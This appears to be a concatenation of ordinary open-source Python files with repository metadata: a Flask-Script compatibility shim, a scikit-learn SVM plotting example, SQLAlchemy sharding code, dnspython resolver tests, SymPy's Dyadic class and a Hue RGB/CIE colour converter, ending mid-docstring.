# -*- coding: utf-8 -*- """ flask_script._compat ~~~~~~~~~~~~~~~~~~~~ Some py2/py3 compatibility support based on a stripped down version of six so we don't have to depend on a specific version of it. :copyright: (c) 2013 by Armin Ronacher. :license: BSD, see LICENSE for more details. """ import sys PY2 = sys.version_info[0] == 2 PYPY = hasattr(sys, 'pypy_translation_info') _identity = lambda x: x if not PY2: unichr = chr range_type = range text_type = str string_types = (str, ) integer_types = (int, ) iterkeys = lambda d: iter(d.keys()) itervalues = lambda d: iter(d.values()) iteritems = lambda d: iter(d.items()) import pickle from io import BytesIO, StringIO NativeStringIO = StringIO def reraise(tp, value, tb=None): if value.__traceback__ is not tb: raise value.with_traceback(tb) raise value ifilter = filter imap = map izip = zip intern = sys.intern implements_iterator = _identity implements_to_string = _identity encode_filename = _identity get_next = lambda x: x.__next__ input = input from string import ascii_lowercase else: unichr = unichr text_type = unicode range_type = xrange string_types = (str, unicode) integer_types = (int, long) iterkeys = lambda d: d.iterkeys() itervalues = lambda d: d.itervalues() iteritems = lambda d: d.iteritems() import cPickle as pickle from cStringIO import StringIO as BytesIO, StringIO NativeStringIO = BytesIO exec('def reraise(tp, value, tb=None):\n raise tp, value, tb') from itertools import imap, izip, ifilter intern = intern def implements_iterator(cls): cls.next = cls.__next__ del cls.__next__ return cls def implements_to_string(cls): cls.__unicode__ = cls.__str__ cls.__str__ = lambda x: x.__unicode__().encode('utf-8') return cls get_next = lambda x: x.next def encode_filename(filename): if isinstance(filename, unicode): return filename.encode('utf-8') return filename input = raw_input from string import lower as ascii_lowercase def with_metaclass(meta, *bases): # This requires a bit of explanation: the basic idea is to make a # dummy metaclass for one level of class instantiation that replaces # itself with the actual metaclass. Because of internal type checks # we also need to make sure that we downgrade the custom metaclass # for one level to something closer to type (that's why __call__ and # __init__ comes back from type etc.). # # This has the advantage over six.with_metaclass in that it does not # introduce dummy classes into the final MRO. class metaclass(meta): __call__ = type.__call__ __init__ = type.__init__ def __new__(cls, name, this_bases, d): if this_bases is None: return type.__new__(cls, name, (), d) return meta(name, bases, d) return metaclass('temporary_class', None, {}) try: from urllib.parse import quote_from_bytes as url_quote except ImportError: from urllib import quote as url_quote
mit
jaidevd/scikit-learn
examples/svm/plot_svm_nonlinear.py
268
1091
""" ============== Non-linear SVM ============== Perform binary classification using non-linear SVC with RBF kernel. The target to predict is a XOR of the inputs. The color map illustrates the decision function learned by the SVC. """ print(__doc__) import numpy as np import matplotlib.pyplot as plt from sklearn import svm xx, yy = np.meshgrid(np.linspace(-3, 3, 500), np.linspace(-3, 3, 500)) np.random.seed(0) X = np.random.randn(300, 2) Y = np.logical_xor(X[:, 0] > 0, X[:, 1] > 0) # fit the model clf = svm.NuSVC() clf.fit(X, Y) # plot the decision function for each datapoint on the grid Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()]) Z = Z.reshape(xx.shape) plt.imshow(Z, interpolation='nearest', extent=(xx.min(), xx.max(), yy.min(), yy.max()), aspect='auto', origin='lower', cmap=plt.cm.PuOr_r) contours = plt.contour(xx, yy, Z, levels=[0], linewidths=2, linetypes='--') plt.scatter(X[:, 0], X[:, 1], s=30, c=Y, cmap=plt.cm.Paired) plt.xticks(()) plt.yticks(()) plt.axis([-3, 3, -3, 3]) plt.show()
bsd-3-clause
maftieu/CouchPotatoServer
libs/sqlalchemy/ext/horizontal_shard.py
18
4953
# ext/horizontal_shard.py # Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """Horizontal sharding support. Defines a rudimental 'horizontal sharding' system which allows a Session to distribute queries and persistence operations across multiple databases. For a usage example, see the :ref:`examples_sharding` example included in the source distribution. """ from sqlalchemy import exc as sa_exc from sqlalchemy import util from sqlalchemy.orm.session import Session from sqlalchemy.orm.query import Query __all__ = ['ShardedSession', 'ShardedQuery'] class ShardedQuery(Query): def __init__(self, *args, **kwargs): super(ShardedQuery, self).__init__(*args, **kwargs) self.id_chooser = self.session.id_chooser self.query_chooser = self.session.query_chooser self._shard_id = None def set_shard(self, shard_id): """return a new query, limited to a single shard ID. all subsequent operations with the returned query will be against the single shard regardless of other state. """ q = self._clone() q._shard_id = shard_id return q def _execute_and_instances(self, context): def iter_for_shard(shard_id): context.attributes['shard_id'] = shard_id result = self._connection_from_session( mapper=self._mapper_zero(), shard_id=shard_id).execute( context.statement, self._params) return self.instances(result, context) if self._shard_id is not None: return iter_for_shard(self._shard_id) else: partial = [] for shard_id in self.query_chooser(self): partial.extend(iter_for_shard(shard_id)) # if some kind of in memory 'sorting' # were done, this is where it would happen return iter(partial) def get(self, ident, **kwargs): if self._shard_id is not None: return super(ShardedQuery, self).get(ident) else: ident = util.to_list(ident) for shard_id in self.id_chooser(self, ident): o = self.set_shard(shard_id).get(ident, **kwargs) if o is not None: return o else: return None class ShardedSession(Session): def __init__(self, shard_chooser, id_chooser, query_chooser, shards=None, query_cls=ShardedQuery, **kwargs): """Construct a ShardedSession. :param shard_chooser: A callable which, passed a Mapper, a mapped instance, and possibly a SQL clause, returns a shard ID. This id may be based off of the attributes present within the object, or on some round-robin scheme. If the scheme is based on a selection, it should set whatever state on the instance to mark it in the future as participating in that shard. :param id_chooser: A callable, passed a query and a tuple of identity values, which should return a list of shard ids where the ID might reside. The databases will be queried in the order of this listing. :param query_chooser: For a given Query, returns the list of shard_ids where the query should be issued. Results from all shards returned will be combined together into a single listing. :param shards: A dictionary of string shard names to :class:`~sqlalchemy.engine.base.Engine` objects. """ super(ShardedSession, self).__init__(query_cls=query_cls, **kwargs) self.shard_chooser = shard_chooser self.id_chooser = id_chooser self.query_chooser = query_chooser self.__binds = {} self.connection_callable = self.connection if shards is not None: for k in shards: self.bind_shard(k, shards[k]) def connection(self, mapper=None, instance=None, shard_id=None, **kwargs): if shard_id is None: shard_id = self.shard_chooser(mapper, instance) if self.transaction is not None: return self.transaction.connection(mapper, shard_id=shard_id) else: return self.get_bind(mapper, shard_id=shard_id, instance=instance).contextual_connect(**kwargs) def get_bind(self, mapper, shard_id=None, instance=None, clause=None, **kw): if shard_id is None: shard_id = self.shard_chooser(mapper, instance, clause=clause) return self.__binds[shard_id] def bind_shard(self, shard_id, bind): self.__binds[shard_id] = bind
gpl-3.0
mollstam/UnrealPy
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/dnspython-1.12.0/tests/test_resolver.py
12
6753
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc. # # Permission to use, copy, modify, and distribute this software and its # documentation for any purpose with or without fee is hereby granted, # provided that the above copyright notice and this permission notice # appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT # OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. import cStringIO import select import sys import time import unittest import dns.name import dns.message import dns.name import dns.rdataclass import dns.rdatatype import dns.resolver resolv_conf = """ /t/t # comment 1 ; comment 2 domain foo nameserver 10.0.0.1 nameserver 10.0.0.2 """ message_text = """id 1234 opcode QUERY rcode NOERROR flags QR AA RD ;QUESTION example. IN A ;ANSWER example. 1 IN A 10.0.0.1 ;AUTHORITY ;ADDITIONAL """ class FakeAnswer(object): def __init__(self, expiration): self.expiration = expiration class BaseResolverTests(object): if sys.platform != 'win32': def testRead(self): f = cStringIO.StringIO(resolv_conf) r = dns.resolver.Resolver(f) self.failUnless(r.nameservers == ['10.0.0.1', '10.0.0.2'] and r.domain == dns.name.from_text('foo')) def testCacheExpiration(self): message = dns.message.from_text(message_text) name = dns.name.from_text('example.') answer = dns.resolver.Answer(name, dns.rdatatype.A, dns.rdataclass.IN, message) cache = dns.resolver.Cache() cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) time.sleep(2) self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testCacheCleaning(self): message = dns.message.from_text(message_text) name = dns.name.from_text('example.') answer = dns.resolver.Answer(name, dns.rdatatype.A, dns.rdataclass.IN, message) cache = dns.resolver.Cache(cleaning_interval=1.0) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) time.sleep(2) self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testZoneForName1(self): name = dns.name.from_text('www.dnspython.org.') ezname = dns.name.from_text('dnspython.org.') zname = dns.resolver.zone_for_name(name) self.failUnless(zname == ezname) def testZoneForName2(self): name = dns.name.from_text('a.b.www.dnspython.org.') ezname = dns.name.from_text('dnspython.org.') zname = dns.resolver.zone_for_name(name) self.failUnless(zname == ezname) def testZoneForName3(self): name = dns.name.from_text('dnspython.org.') ezname = dns.name.from_text('dnspython.org.') zname = dns.resolver.zone_for_name(name) self.failUnless(zname == ezname) def testZoneForName4(self): def bad(): name = dns.name.from_text('dnspython.org', None) zname = dns.resolver.zone_for_name(name) self.failUnlessRaises(dns.resolver.NotAbsolute, bad) def testLRUReplace(self): cache = dns.resolver.LRUCache(4) for i in xrange(0, 5): name = dns.name.from_text('example%d.' % i) answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) for i in xrange(0, 5): name = dns.name.from_text('example%d.' % i) if i == 0: self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) else: self.failUnless(not cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testLRUDoesLRU(self): cache = dns.resolver.LRUCache(4) for i in xrange(0, 4): name = dns.name.from_text('example%d.' % i) answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) name = dns.name.from_text('example0.') cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) # The LRU is now example1. name = dns.name.from_text('example4.') answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) for i in xrange(0, 5): name = dns.name.from_text('example%d.' % i) if i == 1: self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) else: self.failUnless(not cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) def testLRUExpiration(self): cache = dns.resolver.LRUCache(4) for i in xrange(0, 4): name = dns.name.from_text('example%d.' % i) answer = FakeAnswer(time.time() + 1) cache.put((name, dns.rdatatype.A, dns.rdataclass.IN), answer) time.sleep(2) for i in xrange(0, 4): name = dns.name.from_text('example%d.' % i) self.failUnless(cache.get((name, dns.rdatatype.A, dns.rdataclass.IN)) is None) class PollingMonkeyPatchMixin(object): def setUp(self): self.__native_polling_backend = dns.query._polling_backend dns.query._set_polling_backend(self.polling_backend()) unittest.TestCase.setUp(self) def tearDown(self): dns.query._set_polling_backend(self.__native_polling_backend) unittest.TestCase.tearDown(self) class SelectResolverTestCase(PollingMonkeyPatchMixin, BaseResolverTests, unittest.TestCase): def polling_backend(self): return dns.query._select_for if hasattr(select, 'poll'): class PollResolverTestCase(PollingMonkeyPatchMixin, BaseResolverTests, unittest.TestCase): def polling_backend(self): return dns.query._poll_for if __name__ == '__main__': unittest.main()
mit
MechCoder/sympy
sympy/physics/vector/dyadic.py
54
18024
from sympy import sympify, Add, ImmutableMatrix as Matrix from sympy.core.compatibility import u, unicode from .printing import (VectorLatexPrinter, VectorPrettyPrinter, VectorStrPrinter) __all__ = ['Dyadic'] class Dyadic(object): """A Dyadic object. See: http://en.wikipedia.org/wiki/Dyadic_tensor Kane, T., Levinson, D. Dynamics Theory and Applications. 1985 McGraw-Hill A more powerful way to represent a rigid body's inertia. While it is more complex, by choosing Dyadic components to be in body fixed basis vectors, the resulting matrix is equivalent to the inertia tensor. """ def __init__(self, inlist): """ Just like Vector's init, you shouldn't call this unless creating a zero dyadic. zd = Dyadic(0) Stores a Dyadic as a list of lists; the inner list has the measure number and the two unit vectors; the outerlist holds each unique unit vector pair. """ self.args = [] if inlist == 0: inlist = [] while len(inlist) != 0: added = 0 for i, v in enumerate(self.args): if ((str(inlist[0][1]) == str(self.args[i][1])) and (str(inlist[0][2]) == str(self.args[i][2]))): self.args[i] = (self.args[i][0] + inlist[0][0], inlist[0][1], inlist[0][2]) inlist.remove(inlist[0]) added = 1 break if added != 1: self.args.append(inlist[0]) inlist.remove(inlist[0]) i = 0 # This code is to remove empty parts from the list while i < len(self.args): if ((self.args[i][0] == 0) | (self.args[i][1] == 0) | (self.args[i][2] == 0)): self.args.remove(self.args[i]) i -= 1 i += 1 def __add__(self, other): """The add operator for Dyadic. """ other = _check_dyadic(other) return Dyadic(self.args + other.args) def __and__(self, other): """The inner product operator for a Dyadic and a Dyadic or Vector. Parameters ========== other : Dyadic or Vector The other Dyadic or Vector to take the inner product with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer >>> N = ReferenceFrame('N') >>> D1 = outer(N.x, N.y) >>> D2 = outer(N.y, N.y) >>> D1.dot(D2) (N.x|N.y) >>> D1.dot(N.y) N.x """ from sympy.physics.vector.vector import Vector, _check_vector if isinstance(other, Dyadic): other = _check_dyadic(other) ol = Dyadic(0) for i, v in enumerate(self.args): for i2, v2 in enumerate(other.args): ol += v[0] * v2[0] * (v[2] & v2[1]) * (v[1] | v2[2]) else: other = _check_vector(other) ol = Vector(0) for i, v in enumerate(self.args): ol += v[0] * v[1] * (v[2] & other) return ol def __div__(self, other): """Divides the Dyadic by a sympifyable expression. """ return self.__mul__(1 / other) __truediv__ = __div__ def __eq__(self, other): """Tests for equality. Is currently weak; needs stronger comparison testing """ if other == 0: other = Dyadic(0) other = _check_dyadic(other) if (self.args == []) and (other.args == []): return True elif (self.args == []) or (other.args == []): return False return set(self.args) == set(other.args) def __mul__(self, other): """Multiplies the Dyadic by a sympifyable expression. Parameters ========== other : Sympafiable The scalar to multiply this Dyadic with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> 5 * d 5*(N.x|N.x) """ newlist = [v for v in self.args] for i, v in enumerate(newlist): newlist[i] = (sympify(other) * newlist[i][0], newlist[i][1], newlist[i][2]) return Dyadic(newlist) def __ne__(self, other): return not self.__eq__(other) def __neg__(self): return self * -1 def _latex(self, printer=None): ar = self.args # just to shorten things if len(ar) == 0: return str(0) ol = [] # output list, to be concatenated to a string mlp = VectorLatexPrinter() for i, v in enumerate(ar): # if the coef of the dyadic is 1, we skip the 1 if ar[i][0] == 1: ol.append(' + ' + mlp.doprint(ar[i][1]) + r"\otimes " + mlp.doprint(ar[i][2])) # if the coef of the dyadic is -1, we skip the 1 elif ar[i][0] == -1: ol.append(' - ' + mlp.doprint(ar[i][1]) + r"\otimes " + mlp.doprint(ar[i][2])) # If the coefficient of the dyadic is not 1 or -1, # we might wrap it in parentheses, for readability. elif ar[i][0] != 0: arg_str = mlp.doprint(ar[i][0]) if isinstance(ar[i][0], Add): arg_str = '(%s)' % arg_str if arg_str.startswith('-'): arg_str = arg_str[1:] str_start = ' - ' else: str_start = ' + ' ol.append(str_start + arg_str + mlp.doprint(ar[i][1]) + r"\otimes " + mlp.doprint(ar[i][2])) outstr = ''.join(ol) if outstr.startswith(' + '): outstr = outstr[3:] elif outstr.startswith(' '): outstr = outstr[1:] return outstr def _pretty(self, printer=None): e = self class Fake(object): baseline = 0 def render(self, *args, **kwargs): ar = e.args # just to shorten things settings = printer._settings if printer else {} if printer: use_unicode = printer._use_unicode else: from sympy.printing.pretty.pretty_symbology import ( pretty_use_unicode) use_unicode = pretty_use_unicode() mpp = printer if printer else VectorPrettyPrinter(settings) if len(ar) == 0: return unicode(0) bar = u("\N{CIRCLED TIMES}") if use_unicode else "|" ol = [] # output list, to be concatenated to a string for i, v in enumerate(ar): # if the coef of the dyadic is 1, we skip the 1 if ar[i][0] == 1: ol.extend([u(" + "), mpp.doprint(ar[i][1]), bar, mpp.doprint(ar[i][2])]) # if the coef of the dyadic is -1, we skip the 1 elif ar[i][0] == -1: ol.extend([u(" - "), mpp.doprint(ar[i][1]), bar, mpp.doprint(ar[i][2])]) # If the coefficient of the dyadic is not 1 or -1, # we might wrap it in parentheses, for readability. elif ar[i][0] != 0: if isinstance(ar[i][0], Add): arg_str = mpp._print( ar[i][0]).parens()[0] else: arg_str = mpp.doprint(ar[i][0]) if arg_str.startswith(u("-")): arg_str = arg_str[1:] str_start = u(" - ") else: str_start = u(" + ") ol.extend([str_start, arg_str, u(" "), mpp.doprint(ar[i][1]), bar, mpp.doprint(ar[i][2])]) outstr = u("").join(ol) if outstr.startswith(u(" + ")): outstr = outstr[3:] elif outstr.startswith(" "): outstr = outstr[1:] return outstr return Fake() def __rand__(self, other): """The inner product operator for a Vector or Dyadic, and a Dyadic This is for: Vector dot Dyadic Parameters ========== other : Vector The vector we are dotting with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, dot, outer >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> dot(N.x, d) N.x """ from sympy.physics.vector.vector import Vector, _check_vector other = _check_vector(other) ol = Vector(0) for i, v in enumerate(self.args): ol += v[0] * v[2] * (v[1] & other) return ol def __rsub__(self, other): return (-1 * self) + other def __rxor__(self, other): """For a cross product in the form: Vector x Dyadic Parameters ========== other : Vector The Vector that we are crossing this Dyadic with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, cross >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> cross(N.y, d) - (N.z|N.x) """ from sympy.physics.vector.vector import _check_vector other = _check_vector(other) ol = Dyadic(0) for i, v in enumerate(self.args): ol += v[0] * ((other ^ v[1]) | v[2]) return ol def __str__(self, printer=None): """Printing method. """ ar = self.args # just to shorten things if len(ar) == 0: return str(0) ol = [] # output list, to be concatenated to a string for i, v in enumerate(ar): # if the coef of the dyadic is 1, we skip the 1 if ar[i][0] == 1: ol.append(' + (' + str(ar[i][1]) + '|' + str(ar[i][2]) + ')') # if the coef of the dyadic is -1, we skip the 1 elif ar[i][0] == -1: ol.append(' - (' + str(ar[i][1]) + '|' + str(ar[i][2]) + ')') # If the coefficient of the dyadic is not 1 or -1, # we might wrap it in parentheses, for readability. elif ar[i][0] != 0: arg_str = VectorStrPrinter().doprint(ar[i][0]) if isinstance(ar[i][0], Add): arg_str = "(%s)" % arg_str if arg_str[0] == '-': arg_str = arg_str[1:] str_start = ' - ' else: str_start = ' + ' ol.append(str_start + arg_str + '*(' + str(ar[i][1]) + '|' + str(ar[i][2]) + ')') outstr = ''.join(ol) if outstr.startswith(' + '): outstr = outstr[3:] elif outstr.startswith(' '): outstr = outstr[1:] return outstr def __sub__(self, other): """The subtraction operator. """ return self.__add__(other * -1) def __xor__(self, other): """For a cross product in the form: Dyadic x Vector. Parameters ========== other : Vector The Vector that we are crossing this Dyadic with Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, cross >>> N = ReferenceFrame('N') >>> d = outer(N.x, N.x) >>> cross(d, N.y) (N.x|N.z) """ from sympy.physics.vector.vector import _check_vector other = _check_vector(other) ol = Dyadic(0) for i, v in enumerate(self.args): ol += v[0] * (v[1] | (v[2] ^ other)) return ol _sympystr = __str__ _sympyrepr = _sympystr __repr__ = __str__ __radd__ = __add__ __rmul__ = __mul__ def express(self, frame1, frame2=None): """Expresses this Dyadic in alternate frame(s) The first frame is the list side expression, the second frame is the right side; if Dyadic is in form A.x|B.y, you can express it in two different frames. If no second frame is given, the Dyadic is expressed in only one frame. Calls the global express function Parameters ========== frame1 : ReferenceFrame The frame to express the left side of the Dyadic in frame2 : ReferenceFrame If provided, the frame to express the right side of the Dyadic in Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, dynamicsymbols >>> N = ReferenceFrame('N') >>> q = dynamicsymbols('q') >>> B = N.orientnew('B', 'Axis', [q, N.z]) >>> d = outer(N.x, N.x) >>> d.express(B, N) cos(q)*(B.x|N.x) - sin(q)*(B.y|N.x) """ from sympy.physics.vector.functions import express return express(self, frame1, frame2) def to_matrix(self, reference_frame, second_reference_frame=None): """Returns the matrix form of the dyadic with respect to one or two reference frames. Parameters ---------- reference_frame : ReferenceFrame The reference frame that the rows and columns of the matrix correspond to. If a second reference frame is provided, this only corresponds to the rows of the matrix. second_reference_frame : ReferenceFrame, optional, default=None The reference frame that the columns of the matrix correspond to. Returns ------- matrix : ImmutableMatrix, shape(3,3) The matrix that gives the 2D tensor form. Examples ======== >>> from sympy import symbols >>> from sympy.physics.vector import ReferenceFrame, Vector >>> Vector.simp = True >>> from sympy.physics.mechanics import inertia >>> Ixx, Iyy, Izz, Ixy, Iyz, Ixz = symbols('Ixx, Iyy, Izz, Ixy, Iyz, Ixz') >>> N = ReferenceFrame('N') >>> inertia_dyadic = inertia(N, Ixx, Iyy, Izz, Ixy, Iyz, Ixz) >>> inertia_dyadic.to_matrix(N) Matrix([ [Ixx, Ixy, Ixz], [Ixy, Iyy, Iyz], [Ixz, Iyz, Izz]]) >>> beta = symbols('beta') >>> A = N.orientnew('A', 'Axis', (beta, N.x)) >>> inertia_dyadic.to_matrix(A) Matrix([ [ Ixx, Ixy*cos(beta) + Ixz*sin(beta), -Ixy*sin(beta) + Ixz*cos(beta)], [ Ixy*cos(beta) + Ixz*sin(beta), Iyy*cos(2*beta)/2 + Iyy/2 + Iyz*sin(2*beta) - Izz*cos(2*beta)/2 + Izz/2, -Iyy*sin(2*beta)/2 + Iyz*cos(2*beta) + Izz*sin(2*beta)/2], [-Ixy*sin(beta) + Ixz*cos(beta), -Iyy*sin(2*beta)/2 + Iyz*cos(2*beta) + Izz*sin(2*beta)/2, -Iyy*cos(2*beta)/2 + Iyy/2 - Iyz*sin(2*beta) + Izz*cos(2*beta)/2 + Izz/2]]) """ if second_reference_frame is None: second_reference_frame = reference_frame return Matrix([i.dot(self).dot(j) for i in reference_frame for j in second_reference_frame]).reshape(3, 3) def doit(self, **hints): """Calls .doit() on each term in the Dyadic""" return sum([Dyadic([(v[0].doit(**hints), v[1], v[2])]) for v in self.args], Dyadic(0)) def dt(self, frame): """Take the time derivative of this Dyadic in a frame. This function calls the global time_derivative method Parameters ========== frame : ReferenceFrame The frame to take the time derivative in Examples ======== >>> from sympy.physics.vector import ReferenceFrame, outer, dynamicsymbols >>> N = ReferenceFrame('N') >>> q = dynamicsymbols('q') >>> B = N.orientnew('B', 'Axis', [q, N.z]) >>> d = outer(N.x, N.x) >>> d.dt(B) - q'*(N.y|N.x) - q'*(N.x|N.y) """ from sympy.physics.vector.functions import time_derivative return time_derivative(self, frame) def simplify(self): """Returns a simplified Dyadic.""" out = Dyadic(0) for v in self.args: out += Dyadic([(v[0].simplify(), v[1], v[2])]) return out def subs(self, *args, **kwargs): """Substituion on the Dyadic. Examples ======== >>> from sympy.physics.vector import ReferenceFrame >>> from sympy import Symbol >>> N = ReferenceFrame('N') >>> s = Symbol('s') >>> a = s * (N.x|N.x) >>> a.subs({s: 2}) 2*(N.x|N.x) """ return sum([Dyadic([(v[0].subs(*args, **kwargs), v[1], v[2])]) for v in self.args], Dyadic(0)) def applyfunc(self, f): """Apply a function to each component of a Dyadic.""" if not callable(f): raise TypeError("`f` must be callable.") out = Dyadic(0) for a, b, c in self.args: out += f(a) * (b|c) return out dot = __and__ cross = __xor__ def _check_dyadic(other): if not isinstance(other, Dyadic): raise TypeError('A Dyadic must be supplied') return other
bsd-3-clause
oflisback/leaphue
rgb_cie.py
7
8148
""" Library for RGB / CIE1931 coversion. Ported and extended from Bryan Johnson's JavaScript implementation: https://github.com/bjohnso5/hue-hacking Copyright (c) 2014 Benjamin Knight / MIT License. """ import math import random from collections import namedtuple # Represents a CIE 1931 XY coordinate pair. XYPoint = namedtuple('XYPoint', ['x', 'y']) class ColorHelper: Red = XYPoint(0.675, 0.322) Lime = XYPoint(0.4091, 0.518) Blue = XYPoint(0.167, 0.04) def hexToRed(self, hex): """Parses a valid hex color string and returns the Red RGB integer value.""" return int(hex[0:2], 16) def hexToGreen(self, hex): """Parses a valid hex color string and returns the Green RGB integer value.""" return int(hex[2:4], 16) def hexToBlue(self, hex): """Parses a valid hex color string and returns the Blue RGB integer value.""" return int(hex[4:6], 16) def hexToRGB(self, h): """Converts a valid hex color string to an RGB array.""" rgb = [self.hexToRed(h), self.hexToGreen(h), self.hexToBlue(h)] return rgb def rgbToHex(self, r, g, b): """Converts RGB to hex.""" return '%02x%02x%02x' % (r, g, b) def randomRGBValue(self): """Return a random Integer in the range of 0 to 255, representing an RGB color value.""" return random.randrange(0, 256) def crossProduct(self, p1, p2): """Returns the cross product of two XYPoints.""" return (p1.x * p2.y - p1.y * p2.x) def checkPointInLampsReach(self, p): """Check if the provided XYPoint can be recreated by a Hue lamp.""" v1 = XYPoint(self.Lime.x - self.Red.x, self.Lime.y - self.Red.y) v2 = XYPoint(self.Blue.x - self.Red.x, self.Blue.y - self.Red.y) q = XYPoint(p.x - self.Red.x, p.y - self.Red.y) s = self.crossProduct(q, v2) / self.crossProduct(v1, v2) t = self.crossProduct(v1, q) / self.crossProduct(v1, v2) return (s >= 0.0) and (t >= 0.0) and (s + t <= 1.0) def getClosestPointToLine(self, A, B, P): """Find the closest point on a line. This point will be reproducible by a Hue lamp.""" AP = XYPoint(P.x - A.x, P.y - A.y) AB = XYPoint(B.x - A.x, B.y - A.y) ab2 = AB.x * AB.x + AB.y * AB.y ap_ab = AP.x * AB.x + AP.y * AB.y t = ap_ab / ab2 if t < 0.0: t = 0.0 elif t > 1.0: t = 1.0 return XYPoint(A.x + AB.x * t, A.y + AB.y * t) def getClosestPointToPoint(self, xyPoint): # Color is unreproducible, find the closest point on each line in the CIE 1931 'triangle'. pAB = self.getClosestPointToLine(self.Red, self.Lime, xyPoint) pAC = self.getClosestPointToLine(self.Blue, self.Red, xyPoint) pBC = self.getClosestPointToLine(self.Lime, self.Blue, xyPoint) # Get the distances per point and see which point is closer to our Point. dAB = self.getDistanceBetweenTwoPoints(xyPoint, pAB) dAC = self.getDistanceBetweenTwoPoints(xyPoint, pAC) dBC = self.getDistanceBetweenTwoPoints(xyPoint, pBC) lowest = dAB closestPoint = pAB if (dAC < lowest): lowest = dAC closestPoint = pAC if (dBC < lowest): lowest = dBC closestPoint = pBC # Change the xy value to a value which is within the reach of the lamp. cx = closestPoint.x cy = closestPoint.y return XYPoint(cx, cy) def getDistanceBetweenTwoPoints(self, one, two): """Returns the distance between two XYPoints.""" dx = one.x - two.x dy = one.y - two.y return math.sqrt(dx * dx + dy * dy) def getXYPointFromRGB(self, red, green, blue): """Returns an XYPoint object containing the closest available CIE 1931 coordinates based on the RGB input values.""" r = ((red + 0.055) / (1.0 + 0.055))**2.4 if (red > 0.04045) else (red / 12.92) g = ((green + 0.055) / (1.0 + 0.055))**2.4 if (green > 0.04045) else (green / 12.92) b = ((blue + 0.055) / (1.0 + 0.055))**2.4 if (blue > 0.04045) else (blue / 12.92) X = r * 0.4360747 + g * 0.3850649 + b * 0.0930804 Y = r * 0.2225045 + g * 0.7168786 + b * 0.0406169 Z = r * 0.0139322 + g * 0.0971045 + b * 0.7141733 if X + Y + Z == 0: cx = cy = 0 else: cx = X / (X + Y + Z) cy = Y / (X + Y + Z) # Check if the given XY value is within the colourreach of our lamps. xyPoint = XYPoint(cx, cy) inReachOfLamps = self.checkPointInLampsReach(xyPoint) if not inReachOfLamps: xyPoint = self.getClosestPointToPoint(xyPoint) return xyPoint def getRGBFromXYAndBrightness(self, x, y, bri=1): """Returns a rgb tuplet for given x, y values. Not actually an inverse of `getXYPointFromRGB`. Implementation of the instructions found on the Philips Hue iOS SDK docs: http://goo.gl/kWKXKl """ xyPoint = XYPoint(x, y) # Check if the xy value is within the color gamut of the lamp. # If not continue with step 2, otherwise step 3. # We do this to calculate the most accurate color the given light can actually do. if not self.checkPointInLampsReach(xyPoint): # Calculate the closest point on the color gamut triangle # and use that as xy value See step 6 of color to xy. xyPoint = self.getClosestPointToPoint(xyPoint) # Calculate XYZ values Convert using the following formulas: Y = bri X = (Y / xyPoint.y) * xyPoint.x Z = (Y / xyPoint.y) * (1 - xyPoint.x - xyPoint.y) # Convert to RGB using Wide RGB D65 conversion. r = X * 1.612 - Y * 0.203 - Z * 0.302 g = -X * 0.509 + Y * 1.412 + Z * 0.066 b = X * 0.026 - Y * 0.072 + Z * 0.962 # Apply reverse gamma correction. r, g, b = map( lambda x: (12.92 * x) if (x <= 0.0031308) else ((1.0 + 0.055) * pow(x, (1.0 / 2.4)) - 0.055), [r, g, b] ) # Bring all negative components to zero. r, g, b = map(lambda x: max(0, x), [r, g, b]) # If one component is greater than 1, weight components by that value. max_component = max(r, g, b) if max_component > 1: r, g, b = map(lambda x: x / max_component, [r, g, b]) r, g, b = map(lambda x: int(x * 255), [r, g, b]) return (r, g, b) class Converter: color = ColorHelper() def hexToCIE1931(self, h): """Converts hexadecimal colors represented as a String to approximate CIE 1931 coordinates. May not produce accurate values.""" rgb = self.color.hexToRGB(h) return self.rgbToCIE1931(rgb[0], rgb[1], rgb[2]) def rgbToCIE1931(self, red, green, blue): """Converts red, green and blue integer values to approximate CIE 1931 x and y coordinates. Algorithm from: http://www.easyrgb.com/index.php?X=MATH&H=02#text2. May not produce accurate values. """ point = self.color.getXYPointFromRGB(red, green, blue) return [point.x, point.y] def getCIEColor(self, hexColor=None): """Returns the approximate CIE 1931 x, y coordinates 